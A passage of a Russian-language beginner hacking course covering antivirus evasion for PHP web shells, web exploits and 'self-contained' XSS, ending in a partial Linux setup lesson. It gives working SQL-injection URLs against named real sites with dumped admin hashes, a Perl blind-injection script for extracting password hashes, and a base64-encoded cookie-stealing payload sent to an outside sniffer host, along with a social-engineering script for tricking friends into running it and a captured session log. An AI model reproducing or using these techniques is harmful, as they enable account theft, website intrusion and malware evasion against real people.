<?
echo("this is troi");
?>
<bоdу>
<h1>LOL</h1>
</bоdу>
<?
$i = 10;
echo("$i");
?>
----------------------------------------

Разбиваем его на несколько кусков....
1)
<?
echo("this is troi");
?>
2)
<bоdу>
<h1>LOL</h1>
</bоdу>
3)
<?
$i = 10;
echo("$i");
?>

После чего сканируем на наличие вирусов каждый из них.....находим вредоносную часть...и заменяем её на синоним....
Или если эта часть кода вам вообще не нужна ....вы можете её удалить....

Что кстати подходит к нашему случаю....с r57shell.php
Оказалось...что антивирус(по крайней мере мой) реагирует на код который распложен между
<!-- don't delete this plz --> я полазил по интернету....что означает этот Джава скрипт код....и узнал что это просто
напросто счётчик....=-)
Который нам совсем не нужен)))
Удаляем его....и еще раз проверяем на наличие вирусов...и более это не вредоносная программа\скрипт =-)

Поздравляю! это ваш первый опыт в криптографии (я уверен не последний).

Бывают случаи когда антивирусы ищут не только по Коду....но и по комментариям!
Поэтому Удаляйте все лишние комментарии....(Но из уважения к автору ,который написал скрипт...оставляйте его Ник.)

Так мы и поступим с нашим следующим shell`ом remview.php
Удаляем все комментарии-описания...и получаем еще один не "палящийся" шелл код.

Так же бывают случаи ,когда синонима просто нет!
В этом случае к нам приходит на помощь base64
Это гениальная вещь для того , чтобы закриптовать нужный нам код...

Допустим у нас есть..
----------------------------
<?
$x=10;
$y=12;
$z=$x+$y;
echo("$x+$y=$z");
?>
----------------------------
нам нужно сделать так, чтобы антивирус и писку не издал)))

тогда делаем так....
---------------------------------------------------------------------------------
<?
$cod="JHg9MTA7DQokeT0xMjsNCiR6PSR4KyR5Ow0KZWNobygiJHgrJHk9JHoiKTsNCg==";
echo base64_encode($cod);
?>
----------------------------------------------------------------------------------

То что я выделил тёмно синим это тот же код....только закодированный в base64
А сделать это можно тут http://www.motobit.com/util/base64-decoder-encoder.asp

Как вы видите...я взял закодированный код в переменную ....и при помощи функции base64_encode декодировал....
и вывел её...

Таким образом результат не меняется....а антивирус молчит =-)
Так что вы можете экспериментировать на всём.....

Еще пару способов запутать антивирус....это поменять имена переменным....по вставлять хлама....
Прмер: $a=1; $b=3; $a+$b=$z; //хотя мы этого нигде не используем...

Ну и на последок хочу сказать о компилируемых языках....для вас всё выше описанное подходит.....
единственное вам прийдётся туго с base64 там надо скачать и подключить специальную библиотеку которую можно найти тут
http://libb64.sourceforge.net/

А и вот еще что....по экспериментируйте с компиляторами...
Иногда компилятор сам работает как криптор =).

Итог

1)Мы с вами узнали что такое Shell код ...и для чего он нужен на практике рассмотрели его в действии.
2)Наконец поняли почему нам надо учить Unix и не просто поставить и любоваться им....а изучать файловую систему и
базовые команды.
3)Теперь если нам покажут Shell мы не будем робеть....и скажем....мне этот шелл не нравиться давай лучше поставим....
(название шелла)
4)Узнали как устроены антивирусы...и поняли на сколько они не безупречны....шаг в лева шаг в право....
и вирус превращается в дружественную программу
5)Познали основы криптографии.... и я уверен , что мои ученики смогут развить все приведённые способы...
6)Узнали про такой вид кодировки как base64 //Более подробно можете прочитать тут http://ru.wikipedia.org/wiki/Base64
7)И самое главное теперь вы будете более уверенно себя чувствовать в Хакерской терминологии.
______________________________________________________________________________________________

Я вас всех поздравляю с Новым Годом!
Желаю вам всего самого лучшего... и чтобы кризис не затронул вас =)
Удачи!
______________________________________________________________________________________________

Можно пропустить.
_______________________________________________________________
И так...фактически закончились все праздники...и пока у меня есть
время я еще раз постараюсь научить вас....
Слушай Вивальди..."Зима" =) так как по другому у меня просто нервы
не выдержат что то писать)))меня очень сильно родители ругают)))
что ты ничего не стоишь....итд)))Но хотя зачем вам это всё)))
....так сопильки по пускал....и в этот раз я буду писать про такую вещь как....
_______________________________________________________________

Урок 16.

Эксплойты

Exploit (Эксплойт) - от Английского слова Эксплуатировать, вообще эксплойт это найденная уязвимость которая очень
хорошо описана её автором....то есть как правило автор эксплойта пишет скрипт...который нам нужно чуть чуть
подредактировать....чтобы мы могли подставить его под свой случай....(Но это определение не подходит под все эксплойты).
...видов эксплойтов очень много...и я постараюсь рассмотреть наиболее актуальные для нас. //
У нас будет практика и вы 100% поймёте что такое Эксплойты.

Эксплойты используются для взломов сайтов...для получения удалённого доступа к компьютеру через
(уязвимую программу\процесс выполняемый на компьютере\сервере атакуемого) или для полного уничтожения
цели(компьютера\сайта).

И в этом Уроке я вас больше буду знакомить с Эксплойтами для сайтов.

Теперь я вам открываю секрет....почему быть взломщиком сайтов так не легко...
И почему Хакеры не всегда могут взломать сайты Фашистов.....Геев или Секты.
Всё дело в том...что Никто из перечисленных (ну наверное кроме геев не делают сами себе сайты....)
В том плане ....что они используют движки.

И тут мы знакомимся с понятием движки (CMS) - это система управления содержимым.
\\более подробно вы можете прочесть
[link=http://ru.wikipedia.org/wiki/%D0%A1%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0_%D1%83%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F_%D1%81%D0%BE%D0%B4%D0%B5%D1%80%D0%B6%D0%B8%D0%BC%D1%8B%D0%BC]тут[/link] <-

То есть движки....это основа сайта....а всё содержимое уже заполняет её владелец.
А как вы понимаете по началу у движков...всё время находят баги....уязвимости...но как вы понимаете эти движки
развиваются...и все свои недочёты закрывают.....образно говоря....кого легче прочитать .....роман Дарьи Данцовой...
или Войну и мир?....как вы понимаете это не сопоставимые вещи....
Так и тут кого легче взломать? того кто написал свой движок....или использует чужой...испытанный годами....
(поверьте начинающего программиста легче ломануть, по себе знаю, по началу о безопасности никакой речи не
идёт....первым делом идёт речь о функциональности...)

Сейчас я покажу вам примеры самых популярных движков...которые "испытаны годами" и очень часто используются.

1) Joomla -> http://www.seo-joomla.net
2) Datalife engine  -> http://www.nullsoft.cc
3) WordPress -> http://maxsite.org/
4) Ucoz -> http://pokemon-ukraine.ucoz.ua/index/0-22
__________________________________
// Это были движки под сайты.....но не всегда движки предоставляют форумы...и вот популярные движки под форумы.

1) phpbb -> http://www.volchat.ru/forum
2) vBulletin -> http://forumishka.net
3) Invision Power Board (IPB) -> http://forum.exler.ru

//Естественно это отнють не все популярные движки...но нам для примера достаточно.=)

Ну вот мы и познакомились с понятием движки...как вы видите...сайты использующие одинаковые движки ничем не
отличаются(по дизайну) кроме картинок...

Вот несколько способов как я определяю какой движок(и иногда версию движка) использует сайт.
1)Первым делом всегда смотрю на конец страницы.
"Создателям" сайта\форума иногда бывает даже лень стереть версию и название движка как допустим в примере
с http://forumishka.net/ открываем и смотрим в самый конец страницы ....и видим vBulletin® Version 3.7.1 вот
и видим...версию и номер движка.....

2)Потом смотрю на дизайн и так же на логотип(при адресной строке...там картинка маленькая это и есть логотип от
форума\сайта)
\\когда немного наберёте опыта, а это будет очень скоро...вы сможете одним взглядом сказать на каком движке
расположен тот или иной сайт.

3)После этого я смотрю на исходный код строницы....
Как в примере с http://www.nullsoft.cc ....в мета теге лежит вот что "DataLife Engine Nulled by M.I.D-Team"
\\Опять же опытные Хакеры могут по исходному коду определить не только название, но и версию! этого движка...
что очень важно...(версия)

Теперь вы знаете почему не всё так просто...при взломе фашистских сайтов....если бы они делали движок сами.....
то у них бы сайтов вообще не существовало...

Но где плюсы там и минусы....
Так как этот движок может использовать любой проходимец....хакеры этим пользуются и ставят себе этот движок
"для тест драйва"(проверки на прочность). И если этот движок не прошёл эту проверку....отсюда появляется Эксплойт!
о котором мы сейчас поговорим в плотную!

Самые популярные хакерские сайты где выкладывают самые свежие Эксплойты являются.
http://milw0rm.com
http://www.securitylab.ru

Так же есть поисковик эксплойтов.

http://madnet.name/tools/bugsearch/

Теперь мы знаем где взять эксплойты...
Давайте познакомимся какие виды эксплойтов бывают.

Программыне\процессные эксплойты (эти эксплойты могут осуществляться при определённых условиях,
допустим на удалённой машине установлена та или иная программа) проще говоря эти эксплойты написаны для
определённых программ\процессов.
//(сюда входят драйверы,установленные программы)

Так же отдельно можно выделить Эксплойты для Браузеров.
Эти эксплойты используются в таких целях
1)Чтобы браузер самостоятельно скачал открыл и запустил программу.
2)Для запудривание мозгов...в статье про фейк я приводил пример ....там где нужно было спрятать ссылку....
(чтобы при наведении на ссылку в левом нижнем окне отображалась фейковская ссылка(неправильная))
3)Для отказа браузера в работе.....(чтобы он вылетал...или писал критические ошибки)
4)Так же чтобы ваш браузер перед тем как вы попали на нормальную (вашу ссылку) он переходил по еще 100 штукам))))
\\Пример: Вы заразили свой браузер...и теперь когда вы в адресной строке набираете google.com он переходит по sex.com
, nosex.com , nogetro.com итд. и только потом на google.com.
Есть еще много разных видов эксплойтов ...под браузеры...под разные цели...но я назвал основные.

Эксплойты под Операционные Системы.
Эти эксплойты в основном используются для получения удалённого доступа...поднятия прав до привелигерованного
пользователя (Администратор\root) или отказа в обслуживании//Смерть системы...

И наконец эксплойты под WEB
Как я уже сказал....сюда входят уязвимости движков.

И в этой категории есть несколько видов(подкатегорий) эксплойтов.

1)XSS
2)XSRF
3)SQL inj
4)php include

Про два из них...вы уже должны хорошо знать....
А вот про 3ий и 4 пункт я вам пока не рассказывал...
__________________________________________________________________________

После долгой Теории без которой вы бы не обошлись....
Переходим к практике

Рассмотрим на примере эксплойта -> XSS \ SQL inj
http://milw0rm.com/exploits/7672 <-вот эксплойт

Восновном ХSS уязвимости рассматриваются в таком виде...
Exploit(XSS):profile.php?user_id=29&auction_id=9[XssCode]  Что означает [Exploit(XSS)] - это всё что идёт до вот
этого пути profile.php?user_id=29&auction_id=9

А эта часть [XssCode] это наш ядовитый код))))который мы используем....

В этом эксплойте автор нам любезно привёл пример....
(1);</sсriрt>
Но это бывает редко....(эксплойты с примерами)

Как мы видим ...в этом эксплойте описано несколько уязвмостей .....и приведён пример с SQL inj

Вот пример.....
[link=http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat%28id,char%2858%29,
username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--]http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--[/link]

перейдя по ссылке вы найдете вот что....
10:admin:0cc1e6f7500e16099a4b17534136f1e1
Это Логин и Хеш от пароля....этого сайта....
admin - это логин , а через точку с запятой расположен хеш.... 0cc1e6f7500e16099a4b17534136f1e1
Этот хешь(масса) закодирован в md5 кодировку....про которую вы можете более подробно узнать тут
http://ru.wikipedia.org/wiki/MD5

Могу сказать...что md5 это моя головная боль))) хеш это предпоследняя стадия взлома.... =) до логина и
пароля..админа....
то есть разкодировать хеш....то у нас будет админка сайта....

Сделать это в большинстве случаев можно при помощи online md5 декодеров....вот мои самые любимые
http://gdataonline.com/seekhash.php
https://hashcracking.info/index.php
http://passcracking.com/index.php
______________________________________
Но к сожалению они не всегда дают результат.....поэтому есть еще один вариант ....это скачать программу
BarsWF с официального сайта  [link=http://3.14.by/ru/md5%C2%A0]http://3.14.by/ru/md5 [/link] и брутить
пароль при помощи этой программы....(на сайте дана инструкция по применению)
//Отдельное спасибо моему другу про то, что он мне о этой проге рассказал.

Так-с поехали дальше....

В этом же эксплойте вы видите...
"Perl Exploit:"
и какой то непонятный скрипт....

Успокойтесь всё не так страшно как вам кажется....=)))
Знакомьтесь! это Перловый скрипт!
Он выполняет такую же функцию как приведённая мною выше SQL inj ....

Но только делает это при помощи скрипта(суть работы скрипта заключается в том....что он выдерает
с Базы Данных по символу и мы получаем хеш....)

И так....чтобы запустить скрипт...нам нужно иметь Perl интерпретатор....
Если у вас он есть....это очень хорошо))) А если нету....то вам надо установить его вот отсюда
http://soft.softodrom.ru/scr/get.php?id=478 ActivePerl -> это интерпретатор под Windows

И так... Perl это отличный язык программирования....который не требует компиляци...!
И после того как вы установили ActivePerl ....вы можете пользоваться перловыми эксплойтами!
(эксплойты написанные на перл)
Отличительная черна языка Perl от всех остальных....это простота....
Все перловые скрипты начинаются вот с этого....
#!/usr/bin/perl это как определитель...где находится сам интерпретатор....(но вы не пугайтесь....сейчас всё поймете...)

Значит нам нужно чтобы у нас заработал перловый скрипт...
1)Создаём любое_имя.txt файл.
2)Записываем туда скрипт.....(копируем)
____________________________________________________________
#!/usr/bin/perl -w

      use strict;

      use LWP::Simple;

      my $a;

  my $host = "http://www.phpauctions.info/demo/profile.php?user_id=";
  #Тут Может писаться любой сайт...потдерживающи этот скрипт....только учтите
  #Что пишится он доконца...тоесть profile.php?user_id= досюда)))

      my @chars = (48..57, 97..102);

      for my $i(1..32) {

         foreach my $ord(@chars) {

     

         $a =
get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord--");

     

         if($a =~ /coucou/i) {#put the username of the user_id=[id]

           syswrite(STDOUT,chr($ord));

           $i++;

           last;

          }

        }

      }
____________________________________________________________
3)Редактируем код под себя
4)Переименовываем любое_имя.txt в любое_имя.pl //Расширение pl это означает что это перловый файл)
5)Запускаем скрипт.....и у нас в терминале будет появляться (по одной букавке) хеш.....
______________________________________________________
Убедительная просьба....не используйте скрипт до конца....(я имею ввиду....запустите его....
посмотрите как он работает (до 3х букв максимум) ибо когда идёт перебор....посылаются "некорректные"
запросы...и они остаются в логах у админа....представьте ...если хотя-бы 100 человек попробует этот скрипт
до конца....то админ....даже если он лаймер)))всёравно заметит...и закроет дыру.
______________________________________________________

В любом случае я вам просто показал как можно использовать эксплойты написанные на Perl.

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Вы еще что то не поняли....тогда вот еще пример использования эксплойта.....

Рассмотрим следующий эксплойт написанный для joomla!
http://milw0rm.com/exploits/5729

Как вы видите этот эксплойт написан для Joomla которая поддерживает радио или видео.
Так же, если вы заметили , то тут как в первом случае примеров нету...Поэтому я нашёл сам...=)
Примеры использования эксплойта:
1) http://ural-fan.ru/index.php?option=com … &id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users--
//admin:5983e4c69b1465f771d4c91d265219a5
2)http://www.parustv.com/index2.php?optio … &id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users--
//4Rolny48:017849559a523a3f0923b91a5347d217
3)http://dwg-web.com/index2.php?option=co … &id=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user()%20FROM%20jos_users--
//jackalll:7f3ff651c487439dd340fdcbc7978191

Вот еще один эксплойт для Joomla
http://milw0rm.com/exploits/5300
И как вы можете заметить ....опять для определённого компонента.... "com_cinema"
Вот примеры...
1)(username,0x3a,password)/**/from/**/jos_users/*
//admin:3d1c26bc6bf804e7ade03bed7438c1cc
2)(username,0x3a,password)/**/from/**/jos_users/*
//admin:c67f6752a25481cb01b4cd662be3aa3d

Надеюсь теперь вам стало понятнее....
К сожалению не получилось внятно найти эксплойта на php iclude....(я имею ввиду пример...) а вот эксплойт есть.....
http://milw0rm.com/exploits/7658
Так как вы у меня уже грамотные =) я уверен, что вы разберётесь ...если увидите....что то подобное
Вот пример...
www.site.com/admin/admin_words.php?ModN … etc/passwd

И вот хорошая статья про PHP include ....
http://www.netzoom.ru/view/533.html

И наконец я вам должен рассказать про то как можно php скрипты открывать через терминал)
Этот способ используют очень часто в мире эксплойтов....вот вам пример такого эксплойта...
http://milw0rm.com/exploits/7611

И так...что нам нужно....
1)Создаём --- Сохраняем экплойт (который приведён выше).Пример  example.php
2)Открываем командную строку
3)Переходим в каталог(директорию), где расположен файл php.exe Так как у вас установлен сервер...для каждого путь
индивидуален....у меня этот путь будет C:\WebServers\usr\local\php5 там расположен мой файл php.exe
//Если вы точно не знаете где у вас он расположен прибегаем к поисковику...(Ваш стандартный поисковик файлов)
4)Далее перекидываем файл example.php
5)И прописываем в командной строке...
cd [путь к php.еxe] у меня это будет C:\WebServers\usr\local\php5...
Пример: cd C:\WebServers\usr\local\php5 (жмём энтр)

Следующая команда будет

php.exe example.php

Опять жмём энор и видим ...что этот эксплойт предлагает нам опции....
-u - идонтифекатор пользователя....(у администраторов он обычно под номером 1 )
-s (targen for exploting) -Таргет..это цель....или в нашем случае это сайт... то-есть уязвимый сайт...
который мы хотим сломать этим эксплойтом....

Задаём опции
php.exe example.php -s=http:\\site.com\chasti\ -u=1

После того как мы указали правильно параметры...начался брут хеша.....
__________________________________________________________

Итог

1)Мы узнали что такое Exploit и как его используют (для WEB)
2)Узнали почему Хакерам так не легко всё взламывать....и познакомились с понятием "Движок"
3)На практике рассмотрели разные виды эксплойтов под разные движки.
4)Узнали про еще один вид кодирования md5
5)Хоть и чуть чуть....но затронули тему php include (прочитайте ссылку которю я вам дал...)
6)Узнали какие виды эксплойтов бывают....и то что они пишутся под разными языками...(хочу еще добавить ...
большинство Эксплойтов пишется под Perl и PHP, так что подумайте какие языки выбирать для обучения.)
7)Ну и наконец научились Запускать эксплойты из под терминала....(Perl & PHP)

_____________________________________________________________________________________________________
Пожалуй самое тяжёлое при написании этого урока ......это было подобрать примеры.....в основном....я ищу уязвимости сам.
...=)
//Я уверен ,что скоро для вас это тоже станет гораздо удобнее...чем искать експлойты(но знать про них вы обязаны)
Естественно перед этим я проверяю наличие эксплойта...но как правило под то ...что я хочу "позаимствовать" эксплойта
нету...
Так же ...мне очень жаль ...что я вас не познакомил с SQL inj перед тем как давать этот урок....=)
но я надеюсь что когда мы создадим группу ....уже писать буду не только я ....но и Ученики...
либо просто друзья которые захотят писать)))

Надеюсь вы нашли для себя что то новое =)
Удачи!
________________________________________________________________________________________________________

Можно пропустить.
_______________________________________________________________
На моей улице праздник! я сегодня таки сдал статистику!!!!=)
Остался только Экономика Организации Предприятия сдать и всё будет
как в лучших домах лонДонА и пАрижА....
Да, и кстати не торопитесь с созданием группы....когда администраторы
форума сочтут нужным создать группу...тогда это и произойдёт.
Но контрольное письмецо я вышлю =) и ответом на него поделюсь с вами...
Ну а пока давайте продолжим изучать...
_______________________________________________________________

Урок 17.

XSS II ВОССТАНИЕ САМОДОСТАТОЧНЫХ.

Сегодня я хочу рассказать вам о очень мало используемой уязвимости...
но при этом не менее опасной...эта уязвимость называется  самодостаточные XSS.
Называется эта уязвимость самодостаточной потому , что не требует наличия уязвимости на ресурсе...
Сразу сделаю примечание...эта уязвимость не работает в Internet Explorer 6 и 7ой версии...но это не проблемма в наши
дни...так как ими пользуются всё меньше и меньше людей...
Более подробно об этой уязвимости вы можете прочитать здесь http://www.securitylab.ru/analytics/274302.php //
Это чтобы не повторяться.

Всё что нужно , чтобы эта уязвимость заработала...так это чтобы человек(атакуемый) перешёл по ссылке(с того сайта с
которого мы хотим стащить Cookies) вот такого вида....
[link=http://forum.xakep.ru/m_1224792/mpage_28/data:text/html;base64,PHNjcmlwdD4gYWxlcnQoIlhha2VwOTAwOV9SdWxseiI
pOyA8L3NjcmlwdD4=]data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=[/link]
Конечно вы скажете , что никто не перейдёт по такой подозрительной ссылке...
Но ведь мы можем всегда спрятать её.....и вот несколько способов.
1)Прячем ссылку нашим любимым способом через тэг
<a href="Наша_подозрительная_ссылка">Халявные ICQ</a>
//На форумах это используется при помощи тэгов [link ] [/link] и  алгоритм тот же...
2)Прячем ссылку в картинке!
<a href="Наша_ссылка"><IMG src="Любая_ссылка_на_картинку.jpg"></a>
На форумах это делается при помощи всё тех же тэгов [IMG src="image.jpg"]

Вот собственно пару примеров....как можно замаскировать наши "Ядовитые" ссылки....
Но! бывают и случаи когда вы хотите попасть на почту своей девушки....или знакомого друга....

В этих случаях прятать ссылку необязательно....главное применить СИ (социальная инженерия)....
Вот пример как я "ввожу в доверие" моих друзей\подруг\знакомых.
Пишу:
_____________________________________________________
Привет ...посмотри прикол....который я нашёл ....зайди на сайт (сайт с которого мне надо украсть куккисы,
допустим mail.ru) и вставь в адресную строку (там где ты печатаешь ссылки) вот это :

javasсriрt:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=1024; y4=768; x5=1024; y5=768; DI=document.
images; DIL=DI.length; function A(){for(i=0; i<DIL; i++){DIS=DI[ i ].style; DIS.position='absolute';
DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)
И нажми энтор.
______________________________________________________

Когда она\он вставляет в адресную строку и жмёт энтор этот код....она\он видит летающие картинки с этого сайта...
что обычных юзеров приводит в восторг....и под этим чувством мы "впихиваем" ссылку с нашим вредным кодом.
Пример:

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=

И когда жертва говорит, что у неё пустая страница...мы с удивлением говорим...
"Вот досада видимо у тебя браузер не поддерживает этого прикола...=("
А сами идём на сниффер....на котором у нас уже лежат Кукисы жертвы.

Теперь я думаю тактика вам становиться понятна...
Ну а чтобы вы на практике поняли как она работает.....и как она опасна....(эта уязвимость)
Приведу примеры использования...на "скромных ресурсах РУ нета"

1)Угоняем на время mail.ru

И так...нам надо спрятать нашу длинную ссылку в письме....
Но нажав на расширенный формат---Добавить ссылку на сайт или страницу интернет и вставляя нашу ссылку...
мы видим облом...ибо нам пишут ошибку "Неправильный формат ссылки"

Мы бы расстроились и пошли плакать...если бы мы небыли хакерами =)
Но так как мы хакеры...мы догадались.....раз у нас не получается добавить скрытую ссылку через "службы" сайта....
то сделаем через наши "службы"...

А именно.....создаём html страничку вот с таким кодом.
____________________________________
<html>
<bоdу>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=">Ссылка!=)</a>
</bоdу>
</html>
____________________________________

Сохраняем и открываем в нашем браузере.....и видим нашу скрытую ссылку....вот в таком виде....
Ссылка!=) копируем этот текст....и вставляем в наше письмо.....как вы видите...к нам ни единых претензий не
предъявили....
Вот мы и спрятали нашу длинную ссылку.....

Тоже самое можно проделать с картинкой...!!!а это гораздо эффективнее.....скопируйте этот html код ,
сохраните и откройте...потом поймёте почему эффективнее
__________________________________________________________
<html>
<bоdу>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=">
<image src=http://www.ljplus.ru/img3/p/r/prosto_irishka/IMGP1599-.jpg></a>
</bоdу>
</html>
__________________________________________________________

2)Угоняем на время yandex.ru

Что касается Яндекса...
Ничего умнее чем редирект я не нашёл....
Редирект - это перенаправление с одного сайта на другой.....
и вот что у меня получилось....

Но это не единственный способ....поищите другие....допустим с картинками...я не пробовал....уверен у вас
получиться найти больше чем я нашёл =).

3)Угоняем на время Rambler.ru
Rambler на удивление оказался тоже стоикий....
Могу вам сказать...что сначала я искал редиректы.....собственно я нашёл один...
http://www.rambler.ru/click?from=mail&_URL=[наш_любой_сайт]
Вы можете использовать её для перенаправления жертвы на ваш фейк...о котором я писал ранее....
хотя это не единственный редирект...который я нашёл....

Но эти редиректы ...не связанны с сайтом rambler.ru....вы это можете обнаружить из заголовка вылетающей ошибки....
там где атака проходит удачно ...вылетает окно с титлом от сайта...чьи кукисы мы хотим получиьт...

После 10 мин копания я ничего не нашёл....и утешил себя...что даже опытные пользователи не смогли бы заметить
наглый редирект на фейковскую страничку....

А теперь вы можете задать мне вопрос.....зачем нам дурацкая ошибка которая вылетает с твоим ником?
Всё просто....это как и в стандартном XSS мы сначало проверяли на наличие уязвимостей....а теперь можем переделать
в настоящую ядовитую ссылку....и делается это просто....

На прошлих уроках я вас не просто так...познакомил с одним из видов шифрования под названием base64 .
А самодостаточные XSS и основаны на том , что закодированы в этот вид шифрования....чтобы вам стало яснее приведу
пример.

Вот я писал.....
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=
где выдиленая часть это чистая кодировка base64 не верите....разкодируйте тут
http://www.motobit.com/util/base64-decoder-encoder.asp
и вы получите <sсriрt>alert('Xakep9009_Rullz')</sсriрt>
Узнаёте стандартную XSS?

А теперь что мешает нам "впихнуть" вместо "Шуточного" кода "Ядовитый".
Допустим такой....
<sсriрt>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</sсriрt>
Ничего...
Кодируем...в base64 и получаем на выходе:

data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vb2xkLmFudGljaGF0
LnJ1L2NnaS1iaW4vcy5qcGc/Iitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ+

И дальше делаем всё по схеме =)

А теперь давайте представим , что мы хотим угнать контакт.

Да....именно тот который Vkontakte.ru

Делается это очень легко.....
Входим в доверие к нашей жертве....просим вставить в адресную строку

data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vb2xkLmFudGljaGF0LnJ1L2Nna
S1iaW4vcy5qcGc/Iitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ+

А сами в это время сидим и ждём на логе сниффера....
http://old.antichat.ru/sniff/log.php

Обновляем лог ...и видим что-то примерно такое....
[Wed Jan 14 23:33:31 2009] IP=81.158.225.252 SITE=
REFERER=
QUERY=remixlang=0; remixchk=5; remixclosed_tabs=0; remixautobookmark=6; remixgroup_closed_tabs=0;
remixmid=2520472; remixemail=Xakep9009@Gmail.com; remixpass=cb570d109f5e4583f43f7a551e9e6db9;
remixsid=e0b5e7a938255698a0afddcd64351293d527dfb1eca1d2f0c7d78c55
AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5


где значение remixemail Это логин (Xakep9009@gmail.com) , а remixpass наш пароль....зашифрованный в md5
.....который вы можете попытаться разшифровать... тут http://passcracking.com/index.php ну а remixid
это номер идентификатор...контакта который вы ломанули....

Ну и даже если у вас не получилось ломануть вы всегда можете посидеть с этой странички....
при помощи замены Cookies...про которую я тоже писал...в первом уроке про XSS.
Вывод
1)Мы узнали про очень забытую уязвимость...и которая от этого становится в тройне опасной.
2)Мы узнали, что даже если у нас есть недосигаемые сайты такие как Gmail или Vkontakte мы можем
всегда обмануть систему.
3)Вспомнили про методы шифрования md5 и base64
4)Научились быть Самодостаточными и использовать это
5)Узнали и научились обходить ограничения сайта подручными средствами (Пример с Ctrl+C и Ctrl+v в mail).
7)Еще раз убедились что СИ мощнейшее оружие Хакера(Пример с летающими картинками)
6)И наконец осознали , что XSS это мега уязвимость!

________________________________________________________________________________________________________________________

Думаю , что на этом достаточно....
Видео к этому Уроку....
Сразу скажу весит много.... 53МБ идёт 5 минут....
Поэтому кто сам во всём разобрался скачивать нету смысла...файл такой большой получится...
потому как я сделал акцент на качество.....меня лично раздрожают фидео ролики кде кроме квадратов ничего не
разглядишь....
Да и файл в формате wmv
http://webfile.ru/2564653

Надеюсь вы узнали что-то новое для себя или повторили старое.
Удачи!

_______________________________________________________________________________________________________

Можно пропустить.
_______________________________________________________________
Всех с прошедшими праздниками!
Конечно я их провёл не так как бы хотелось(болел) но всётаки...
Не писал так долго потому как готовился к пересдаче английского....
что у меня так и не получилось =\
В этом уроке я расскажу как безболезненно пересесть с Windows XP - Vista
на Ubuntu при этом не просто пересесть, но еще установить хакерский набор
тулз на все случаи жизни...
_______________________________________________________________

Урок 18.

Linux

Первое с чего надо начать это что такое Linux и для чего он мне нужен?
Linux  - http://ru.wikipedia.org/wiki/Linux

А нужен Linux для нескольких важных целей....
1)Изучение структуры и работы Linux
2)Если вы будете ездить в европу с вашим ноутбуком там где установлена пиратская винда с вас могут взять огромный
штраф и вплоть до срока
(С моего друга в Америке взяли штраф 400$ за то что его поймали в супермарките! с пиратской виндой)
3)Перед вами сразу откроется огромный прастор в плане хакерского ПО.
4)Большая часть сис админов уже сидит под такими видами ОС как Rad Hat, Mandriva , Ubuntu Server итд... так что
игнорировать Linux мы больше не в состоянии....

Ubuntu 8.10

На момент написания этого урока 8.10 является самой новой версией Ubuntu....
скачать которую можно c официального сайта....
http://www.ubuntu.com/getubuntu/download
Весит эта ОС 700 МБ
  Преимущество заключается в том что эта операционная система предназначена для начинающих пользователей Linux ,
но это не значит , что ей пользуются только новички....она сама по себе очень удобна и легка в установке.
Что самое главное вы можете установить Ubuntu прямо под виндой! (открыв скачанный архив .iso ) а там должен лежать
файл wubi.exe
  Открываете его.... после чего вы можете с лёгкостью установить Ubuntu (Разобраться как это сделать вы сможете)
//Лично я ставил Ubuntu как основную ось а на неё наложил уже Windows XP как это сделать будет описано ниже.
После того как вы успешно установили Ubuntu при перезагрузке компьютера у вас будет несколько вариантов
1)Ubuntu 8.10
2)Windows XP - Vista (ну или что там у вас ^^)
Ну и выбираете вариант 1 загружаетесь под Ubuntu выбираете второй под XP...

_____________________________________________________________________________________________
Для тех кто выбрал Ubuntu как основную ось....после того как вы установили её у вас возникнет вопрос....как же быть
с моим принтером или CS (контра)?
Решение есть.....
VirtualBox - это бесплатная программа которая позволяет создавать виртуальные машины в основной ОС
http://www.virtualbox.org/wiki/Linux_Downloads
//привыкайте что в Linux нет платных программ.....(платный аналог, но уже под Windows vmware workstation)
И так ....после того как вы скачали VirtualBox в формате .deb и открыв его менеджером архивов он вам предложит его
установить...нажав кнопку install вас ждёт разочарование.....так как вам нужны права root которых у вас пока нету....
Приобретаем права root
